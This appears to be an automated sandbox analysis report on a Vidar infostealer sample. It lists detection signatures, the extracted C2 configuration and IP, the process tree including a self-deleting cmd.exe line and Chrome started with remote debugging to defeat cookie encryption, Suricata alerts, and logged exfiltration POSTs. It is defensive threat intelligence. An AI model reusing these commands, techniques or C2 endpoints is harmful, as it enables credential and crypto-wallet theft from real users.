Edit tour

Windows Analysis Report
Cm2GRjWK1C.exe

Overview

General Information

Sample name:	Cm2GRjWK1C.exe renamed because original name is a hash value
Original sample name:	9a6088f8f1880ab2d28748fed448b4bc.exe
Analysis ID:	1639254
MD5:	9a6088f8f1880ab2d28748fed448b4bc
SHA1:	a5ced9f99e56c0d706bb974200c03db64e00db57
SHA256:	3078a82218b5bb136c0420d8415d3943f0bd10180efefe298869a5401ddb1f96
Tags:	exeuser-abuse_ch
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Cm2GRjWK1C.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\Cm2GRjWK1C.exe" MD5: 9A6088F8F1880AB2D28748FED448B4BC)

chrome.exe (PID: 2888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,6494542625534998801,13089621614096395101,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2452 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

cmd.exe (PID: 3996 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dba1d" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2020 cmdline: timeout /t 11 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199829660832", "Botnet": "ir7am"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1285961370.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Cm2GRjWK1C.exe PID: 7628	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Cm2GRjWK1C.exe PID: 7628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Cm2GRjWK1C.exe", ParentImage: C:\Users\user\Desktop\Cm2GRjWK1C.exe, ParentProcessId: 7628, ParentProcessName: Cm2GRjWK1C.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2888, ProcessName: chrome.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:17.393793+0100	2028765	3	Unknown Traffic	192.168.2.4	49725	95.217.30.53	443	TCP
2025-03-15T08:29:18.724812+0100	2028765	3	Unknown Traffic	192.168.2.4	49728	95.217.30.53	443	TCP
2025-03-15T08:29:20.149917+0100	2028765	3	Unknown Traffic	192.168.2.4	49729	95.217.30.53	443	TCP
2025-03-15T08:29:21.567276+0100	2028765	3	Unknown Traffic	192.168.2.4	49730	95.217.30.53	443	TCP
2025-03-15T08:29:22.983223+0100	2028765	3	Unknown Traffic	192.168.2.4	49732	95.217.30.53	443	TCP
2025-03-15T08:29:24.445768+0100	2028765	3	Unknown Traffic	192.168.2.4	49734	95.217.30.53	443	TCP
2025-03-15T08:29:25.729984+0100	2028765	3	Unknown Traffic	192.168.2.4	49735	95.217.30.53	443	TCP
2025-03-15T08:29:26.813803+0100	2028765	3	Unknown Traffic	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:27.872966+0100	2028765	3	Unknown Traffic	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:29.890611+0100	2028765	3	Unknown Traffic	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:37.992816+0100	2028765	3	Unknown Traffic	192.168.2.4	49765	95.217.30.53	443	TCP
2025-03-15T08:29:39.026294+0100	2028765	3	Unknown Traffic	192.168.2.4	49766	95.217.30.53	443	TCP
2025-03-15T08:29:40.040881+0100	2028765	3	Unknown Traffic	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:41.062973+0100	2028765	3	Unknown Traffic	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:42.090212+0100	2028765	3	Unknown Traffic	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:43.261457+0100	2028765	3	Unknown Traffic	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:44.222882+0100	2028765	3	Unknown Traffic	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:46.564225+0100	2028765	3	Unknown Traffic	192.168.2.4	49772	95.217.30.53	443	TCP
2025-03-15T08:29:47.281969+0100	2028765	3	Unknown Traffic	192.168.2.4	49773	95.217.30.53	443	TCP
2025-03-15T08:29:48.922304+0100	2028765	3	Unknown Traffic	192.168.2.4	49774	95.217.30.53	443	TCP
2025-03-15T08:29:50.389076+0100	2028765	3	Unknown Traffic	192.168.2.4	49775	95.217.30.53	443	TCP
2025-03-15T08:29:55.507903+0100	2028765	3	Unknown Traffic	192.168.2.4	49776	95.217.30.53	443	TCP
2025-03-15T08:29:57.490527+0100	2028765	3	Unknown Traffic	192.168.2.4	49777	95.217.30.53	443	TCP
2025-03-15T08:29:58.948311+0100	2028765	3	Unknown Traffic	192.168.2.4	49778	95.217.30.53	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:22.306742+0100	2044247	1	Malware Command and Control Activity Detected	95.217.30.53	443	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:23.723002+0100	2051831	1	Malware Command and Control Activity Detected	95.217.30.53	443	192.168.2.4	49732	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:20.893740+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49729	95.217.30.53	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:25.125770+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49734	95.217.30.53	443	TCP
2025-03-15T08:29:26.535097+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49735	95.217.30.53	443	TCP
2025-03-15T08:29:26.816976+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:27.875680+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:29.893630+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:38.816903+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49765	95.217.30.53	443	TCP
2025-03-15T08:29:39.839379+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49766	95.217.30.53	443	TCP
2025-03-15T08:29:40.043577+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:41.065883+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:42.098410+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:43.264024+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:44.225875+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:46.574343+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49772	95.217.30.53	443	TCP
2025-03-15T08:29:51.119420+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49775	95.217.30.53	443	TCP
2025-03-15T08:29:55.510492+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	49776	95.217.30.53	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:26.816976+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:27.875680+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:29.893630+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:40.043577+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:41.065883+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:42.098410+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:43.264024+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:44.225875+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:46.574343+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	49772	95.217.30.53	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T08:29:19.471355+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49728	95.217.30.53	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199829660832", "Botnet": "ir7am"}

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D46A10 StrStrA,lstrlen,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlen,		0_3_02D46A10
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D50830 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,		0_3_02D50830

Source: Cm2GRjWK1C.exe, 00000000.00000002.1677411766.000000000053A000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_344ae7ad-b

Source: Cm2GRjWK1C.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 95.217.30.53:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.30.53:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: Cm2GRjWK1C.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: f:\workspace\installer\online\setup\Release\R_Online.pdb source: Cm2GRjWK1C.exe

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D4B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,	0_3_02D4B6B0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D55EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	0_3_02D55EB0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D54E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindClose,	0_3_02D54E70
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D47210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,memset,CopyFileA,DeleteFileA,memset,FindClose,	0_3_02D47210
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D53FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,FindClose,	0_3_02D53FD0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D413F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,	0_3_02D413F0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D53580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,	0_3_02D53580
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D497B0 FindFirstFileA,FindNextFileA,strlen,	0_3_02D497B0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D48360 FindFirstFileA,CopyFileA,FindNextFileA,strlen,CopyFileA,FindClose,	0_3_02D48360
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D4ACD0 wsprintfA,FindFirstFileA,strlen,lstrlen,DeleteFileA,CopyFileA,FindClose,	0_3_02D4ACD0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D48C90 lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,strlen,lstrcpy,memset,lstrcpy,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpy,lstrcpy,CopyFileA,FindClose,FindClose,DeleteFileA,	0_3_02D48C90
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D54950 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrlen,lstrlen,	0_3_02D54950

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D53AF0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrlen,

0_3_02D53AF0

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 15MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49728 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49729 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49765 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.30.53:443 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49735 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49734 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49737 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49737 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49738 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49738 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49768 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49768 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49770 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49770 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49769 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49769 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49736 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49736 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49767 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49767 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49771 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49771 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49766 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.30.53:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49772 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49772 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49775 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49776 -> 95.217.30.53:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199829660832

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.217.30.53Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5fHost: 95.217.30.53Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----5phv37gl6xlf3ekf3e37Host: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----tr9r1d26x4wtje3ohv3wHost: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----iwtjmycbsr1vaa1ngvknHost: 95.217.30.53Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ba1dj58glx4ozm7q900hHost: 95.217.30.53Content-Length: 5517Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5fHost: 95.217.30.53Content-Length: 489Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----srq9hlxlfcbaiek6ppphHost: 95.217.30.53Content-Length: 262605Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9zmy5xtj5xbimyusrimoHost: 95.217.30.53Content-Length: 55081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvasHost: 95.217.30.53Content-Length: 186149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----mophlxlng4o8qiwt2nozHost: 95.217.30.53Content-Length: 505Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4wbi5xt2689zmyc26pppHost: 95.217.30.53Content-Length: 493Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8glx4o8qq1dje3ec2n7qHost: 95.217.30.53Content-Length: 169765Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ng4eusj5fk6f3e3ek6fkHost: 95.217.30.53Content-Length: 66001Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8900hvkx4wtjm7g4e3w4Host: 95.217.30.53Content-Length: 153381Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ppp8q1ny58q1va16xln7Host: 95.217.30.53Content-Length: 393697Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2dba1dbsrqq9zuasriwlHost: 95.217.30.53Content-Length: 131557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----37ycjmycbsr1nyu3wlxlHost: 95.217.30.53Content-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7q16x4790zmgv3wbimozHost: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvasHost: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
